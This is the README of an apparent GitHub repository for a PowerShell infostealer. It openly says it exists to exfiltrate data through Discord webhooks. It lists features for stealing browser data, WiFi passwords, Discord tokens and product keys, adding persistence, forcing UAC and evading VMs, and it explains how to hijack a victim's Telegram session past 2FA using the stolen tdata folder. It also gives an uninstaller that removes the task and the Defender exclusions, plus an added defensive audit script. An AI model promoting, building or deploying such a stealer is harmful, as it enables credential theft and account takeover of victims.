GUS32663/Power-Shell-Token-Stealer

PowerShell Token Grabber

This tool is made for data exfiltration. All collected information is sent using Discord webhooks.

Usage

  • Create a Webhook on your Discord Server. I recommend creating a new server.
  • Replace YOUR_WEBHOOK_HERE in line 6 with your webhook.

Want to obfuscate the code?

Use Invoke-Obfuscation.
Or use Somalifuscator for .bat files

Features

  • GUI Builder
  • Force UAC
  • Anti-VM
  • Persistence via Task Scheduler
  • Extracts WiFi Passwords
  • Extracts Browser Data (Brave, Chrome, Firefox, Microsoft Edge etc.)
  • Telegram Session Stealer that Bypasses 2FA
  • Extracts Discord Token
  • Get System Information (Version, CPU, DISK, GPU, RAM, IP, Installed Apps etc.)
  • Takes Desktop Screenshot
  • Get System Uptime
  • Get Screen Resolution
  • List of Installed Applications
  • List of Installed Antiviruses
  • List of all Network Adapters
  • List of Apps that Run On Startup
  • List of Running Services & Applications
  • List TCP Connections and Underlying Process
  • Extracts Product Key
  • Self-Destructs After Execution (optional)

Telegram-Stealer Usage

After the exfiltrated data is uploaded to your Discord webhook, download the compressed file KDOT.zip. Inside it there is another zipped folder, telegram-session.zip; extract it on your PC. Now copy the tdata folder and paste it into the directory below:

%userprofile%\AppData\Roaming\Telegram Desktop

Before pasting the tdata folder, ensure that you have deleted the existing tdata folder on your PC.

🗑 Uninstaller (Removes the Scheduled Task, Script Folder and ExclusionPaths)

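  • Open a new elevated PowerShell console and paste the contents below:

# Suppress errors so an artifact that is already gone does not stop the cleanup
$ErrorActionPreference = "SilentlyContinue"
function Cleanup {
  # Remove the persistence scheduled task
  Unregister-ScheduledTask -TaskName "KDOT" -Confirm:$False
  # Delete the script folder
  Remove-Item -Path "$env:appdata\KDOT" -Force -Recurse
  # Remove the Microsoft Defender exclusion paths
  Remove-MpPreference -ExclusionPath "$env:APPDATA\KDOT"
  Remove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
  # Printed unconditionally: errors are suppressed above, so this does not confirm removal
  Write-Host "[~] Successfully Uninstalled !" -ForegroundColor Green
}
Cleanup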
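
The uninstaller above names three host artifacts: a scheduled task called KDOT, a KDOT folder under %APPDATA%, and two Microsoft Defender exclusion paths. The following read-only audit is an added example, not part of this repository; it reports those artifacts without changing anything, and it goes beyond the uninstaller by checking every local profile rather than only the current user. The function name Find-KdotArtifact is hypothetical, and the script assumes an elevated console on a host with the Defender and ScheduledTasks modules available.

```powershell
# Added example (not the repository's code): read-only audit for the artifacts
# the uninstaller removes. Find-KdotArtifact is a hypothetical name.
function Find-KdotArtifact {
    # 1. Scheduled task named "KDOT" (persistence)
    $tasks = Get-ScheduledTask -TaskName 'KDOT' -ErrorAction SilentlyContinue
    foreach ($t in $tasks) {
        [pscustomobject]@{
            Type   = 'ScheduledTask'
            Item   = "$($t.TaskPath)$($t.TaskName)"
            Detail = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        }
    }

    # 2. Script folder under every local profile, not only the current user's
    $profilesRoot = Split-Path -Path $env:USERPROFILE -Parent
    $userDirs = Get-ChildItem -Path $profilesRoot -Directory -Force -ErrorAction SilentlyContinue
    foreach ($u in $userDirs) {
        $dir = Join-Path $u.FullName 'AppData\Roaming\KDOT'
        if (Test-Path -LiteralPath $dir) {
            [pscustomobject]@{ Type = 'Folder'; Item = $dir; Detail = 'script folder present' }
        }
    }

    # 3. Defender exclusions ending in \AppData\Roaming\KDOT or \AppData\Local\Temp
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if (-not $pref) {
        Write-Warning 'Get-MpPreference is unavailable; Defender exclusions were not checked.'
        return
    }
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p -like 'N/A*') {
            # Non-elevated sessions get a placeholder string instead of the real list
            Write-Warning 'Exclusions are hidden from non-admin sessions; re-run elevated.'
        }
        elseif ($p -match '\\AppData\\(Roaming\\KDOT|Local\\Temp)\\?$') {
            [pscustomobject]@{ Type = 'DefenderExclusion'; Item = $p; Detail = 'exclusion path set' }
        }
    }
}

Find-KdotArtifact | Format-Table -AutoSize -Wrap
```

An exclusion on a user's whole Temp folder is worth reviewing on its own, since it leaves a commonly abused staging location unscanned regardless of how it was set.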

Disclaimer

I, the creator, am not responsible for any actions and/or damages caused by this software. You bear the full responsibility of your actions and acknowledge that this tool was created for educational purposes only. This tool's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.
